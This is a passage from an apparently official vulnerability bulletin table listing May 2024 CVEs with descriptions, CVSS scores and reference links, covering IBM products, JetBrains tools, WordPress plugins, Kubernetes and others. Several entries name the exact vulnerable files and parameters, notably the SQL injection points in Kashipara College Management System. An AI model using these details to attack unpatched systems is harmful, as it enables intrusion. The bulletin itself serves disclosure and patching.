<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28761" target="_blank">CVE-2024-28761</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/285245" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150847" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--App Connect Enterprise<br> </td>
<td>IBM App Connect Enterprise 11.0.0.1 through 11.0.0.25 and 12.0.1.0 through 12.0.12.0 dashboard is vulnerable to a denial of service due to improper restrictions of resource allocation. IBM X-Force ID: 285244.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28760&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28760" target="_blank">CVE-2024-28760</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/285244" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150845" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--QRadar SIEM<br> </td>
<td>IBM QRadar SIEM 7.5 could allow a privileged user to configure user management that would disclose unintended sensitive information across tenants. IBM X-Force ID: 284575.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27269&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27269" target="_blank">CVE-2024-27269</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/284575" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150684" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--SDK, Java Technology Edition<br> </td>
<td>The IBM SDK, Java Technology Edition's Object Request Broker (ORB) 7.1.0.0 through 7.1.5.21 and 8.0.0.0 through 8.0.8.21 is vulnerable to a denial of service attack in some circumstances due to improper enforcement of the JEP 290 MaxRef and MaxDepth deserialization filters. IBM X-Force ID: 260578.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38264&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38264" target="_blank">CVE-2023-38264</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/260578" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150727" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--Security Guardium<br> </td>
<td>IBM Security Guardium 12.0 could allow a privileged user to perform unauthorized actions that could lead to a denial of service. IBM X-Force ID: 271690.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47717&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47717" target="_blank">CVE-2023-47717</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/271690" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7152469" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--Spectrum Fusion HCI<br> </td>
<td>IBM Spectrum Fusion HCI 2.5.2 through 2.7.2 could allow an attacker to perform unauthorized actions in RGW for Ceph due to improper bucket access. IBM X-Force ID: 266807.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43040&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43040" target="_blank">CVE-2023-43040</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/266807" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7151040" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--TXSeries for Multiplatforms<br> </td>
<td>IBM TXSeries for Multiplatforms 8.2 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 280191.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22344&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22344" target="_blank">CVE-2024-22344</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/280191" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150667" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--TXSeries for Multiplatforms<br> </td>
<td>IBM TXSeries for Multiplatforms 8.2 transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. IBM X-Force ID: 280192.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22345&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22345" target="_blank">CVE-2024-22345</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/280192" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150667" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--TXSeries for Multiplatforms<br> </td>
<td>IBM TXSeries for Multiplatforms 8.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 280190.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22343&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22343" target="_blank">CVE-2024-22343</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/280190" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150667" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--UrbanCode Deploy<br> </td>
<td>IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.20, 7.1 through 7.1.2.16, 7.2 through 7.2.3.9, 7.3 through 7.3.2.4, and 8.0 through 8.0.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 285654.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28781&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28781" target="_blank">CVE-2024-28781</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/285654" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150747" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>ITPison--OMICARD EDM<br> </td>
<td>ITPison OMICARD EDM fails to properly filter specific URL parameter, allowing unauthenticated remote attackers to modify the parameters and conduct Server-Side Request Forgery (SSRF) attacks. This vulnerability enables attackers to probe internal network information.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4894&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4894" target="_blank">CVE-2024-4894</a><br><a href="https://www.twcert.org.tw/en/cp-139-7803-c0f73-2.html" target="_blank">twcert@cert.org.tw</a><br><a href="https://www.twcert.org.tw/tw/cp-132-7802-18f3c-1.html" target="_blank">twcert@cert.org.tw</a></td>
</tr>
<tr>
<td>Imran Sayed--Headless CMS<br> </td>
<td>Missing Authorization vulnerability in Imran Sayed Headless CMS.This issue affects Headless CMS: from n/a through 2.0.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-34186&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-34186" target="_blank">CVE-2023-34186</a><br><a href="https://patchstack.com/database/vulnerability/headless-cms/wordpress-headless-cms-plugin-2-0-3-broken-authentication-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>JFrog--Artifactory<br> </td>
<td>A Header Injection vulnerability in the JFrog platform in versions below 7.85.0 (SaaS) and 7.84.7 (Self-Hosted) may allow threat actors to take over the end user's account when clicking on a specially crafted URL sent to the victim's user email.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2248&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2248" target="_blank">CVE-2024-2248</a><br><a href="https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories" target="_blank">reefs@jfrog.com</a></td>
</tr>
<tr>
<td>JetBrains--TeamCity<br> </td>
<td>In JetBrains TeamCity before 2024.03.1 commit status publisher didn't check project scope of the GitHub App token</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35301&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35301" target="_blank">CVE-2024-35301</a><br><a href="https://www.jetbrains.com/privacy-security/issues-fixed/" target="_blank">cve@jetbrains.com</a></td>
</tr>
<tr>
<td>JetBrains--TeamCity<br> </td>
<td>In JetBrains TeamCity before 2023.11 stored XSS during restore from backup was possible</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35302&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35302" target="_blank">CVE-2024-35302</a><br><a href="https://www.jetbrains.com/privacy-security/issues-fixed/" target="_blank">cve@jetbrains.com</a></td>
</tr>
<tr>
<td>JetBrains--YouTrack<br> </td>
<td>In JetBrains YouTrack before 2024.1.29548 the SMTPS protocol communication lacked proper certificate hostname validation</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35299&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35299" target="_blank">CVE-2024-35299</a><br><a href="https://www.jetbrains.com/privacy-security/issues-fixed/" target="_blank">cve@jetbrains.com</a></td>
</tr>
<tr>
<td>Justin Silver--Remote Content Shortcode<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Justin Silver Remote Content Shortcode allows PHP Local File Inclusion.This issue affects Remote Content Shortcode: from n/a through 1.5.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45652&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45652" target="_blank">CVE-2023-45652</a><br><a href="https://patchstack.com/database/vulnerability/remote-content-shortcode/wordpress-remote-content-shortcode-plugin-1-5-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Justin Tadlock--Unique<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Tadlock Unique allows Stored XSS.This issue affects Unique: from n/a through 0.3.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33952&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33952" target="_blank">CVE-2024-33952</a><br><a href="https://patchstack.com/database/vulnerability/unique/wordpress-unique-theme-0-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Kashipara College Management System 1.0. This affects an unknown part of the file view_each_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263919.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4799&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4799" target="_blank">CVE-2024-4799</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%202.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263919" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263919" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332544" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability has been found in Kashipara College Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file submit_student.php. The manipulation of the argument date_of_birth leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263920.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4800&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4800" target="_blank">CVE-2024-4800</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%203.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263920" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263920" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332545" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability was found in Kashipara College Management System 1.0 and classified as critical. This issue affects some unknown processing of the file submit_new_faculty.php. The manipulation of the argument address leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263921 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4801&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4801" target="_blank">CVE-2024-4801</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%204.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263921" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263921" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332552" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability was found in Kashipara College Management System 1.0. It has been classified as critical. Affected is an unknown function of the file submit_extracurricular_activity.php. The manipulation of the argument activity_datetime leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263922 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4802&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4802" target="_blank">CVE-2024-4802</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%205.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263922" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263922" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332553" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability was found in Kashipara College Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file submit_admin.php. The manipulation of the argument phone leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263923.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4803&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4803" target="_blank">CVE-2024-4803</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%206.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263923" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263923" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332554" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability was found in Kashipara College Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file edit_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263924.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4804&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4804" target="_blank">CVE-2024-4804</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%207.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263924" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263924" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332555" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability classified as critical has been found in Kashipara College Management System 1.0. This affects an unknown part of the file edit_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263925 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4805&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4805" target="_blank">CVE-2024-4805</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%208.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263925" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263925" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332556" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability classified as critical was found in Kashipara College Management System 1.0. This vulnerability affects unknown code of the file each_extracurricula_activities.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263926 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4806&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4806" target="_blank">CVE-2024-4806</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%209.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263926" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263926" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332557" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability, which was classified as critical, has been found in Kashipara College Management System 1.0. This issue affects some unknown processing of the file delete_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263927.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4807&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4807" target="_blank">CVE-2024-4807</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%2010.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263927" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263927" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332564" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Kashipara College Management System 1.0. Affected is an unknown function of the file delete_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263928.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4808&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4808" target="_blank">CVE-2024-4808</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%2011.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263928" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263928" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332565" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kashipara--College Management System<br> </td>
<td>A vulnerability classified as critical has been found in Kashipara College Management System 1.0. Affected is an unknown function of the file view_students_each_detail.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264438 is the identifier assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4905&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4905" target="_blank">CVE-2024-4905</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/College%20Management%20System/College%20Management%20System%20-%20vuln%201.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264438" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264438" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332543" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Kiboko Labs--Arigato Autoresponder and Newsletter<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Kiboko Labs Arigato Autoresponder and Newsletter.This issue affects Arigato Autoresponder and Newsletter: from n/a through 2.7.2.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34823&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34823" target="_blank">CVE-2024-34823</a><br><a href="https://patchstack.com/database/vulnerability/bft-autoresponder/wordpress-arigato-autoresponder-and-newsletter-plugin-2-7-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Kioware--Kioware<br> </td>
<td>KioWare for Windows (versions all through 8.35) allows to brute force the PIN number, which protects the application from being closed, as there are no mechanisms preventing a user from excessively guessing the number.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3461&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3461" target="_blank">CVE-2024-3461</a><br><a href="https://cert.pl/en/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://www.kioware.com/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Kubernetes--azure-file-csi-driver<br> </td>
<td>A security issue was discovered in azure-file-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3744&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3744" target="_blank">CVE-2024-3744</a><br><a href="https://github.com/kubernetes/kubernetes/issues/124759" target="_blank">jordan@liggitt.net</a><br><a href="https://groups.google.com/g/kubernetes-security-announce/c/hcgZE2MQo1A/m/Y4C6q-CYAgAJ" target="_blank">jordan@liggitt.net</a></td>
</tr>
<tr>
<td>Linux--Linux kernel<br> </td>
<td>In register_device, the return value of ida_simple_get is unchecked, in witch ida_simple_get will use an invalid index value. To address this issue, index should be checked after ida_simple_get. When the index value is abnormal, a warning message should be printed, the port should be dropped, and the value should be recorded.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4810&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4810" target="_blank">CVE-2024-4810</a><br><a href="https://bugzilla.openanolis.cn/show_bug.cgi?id=9008" target="_blank">security@openanolis.org</a></td>
</tr>
<tr>
<td>LionScripts--IP Blocker Lite<br> </td>
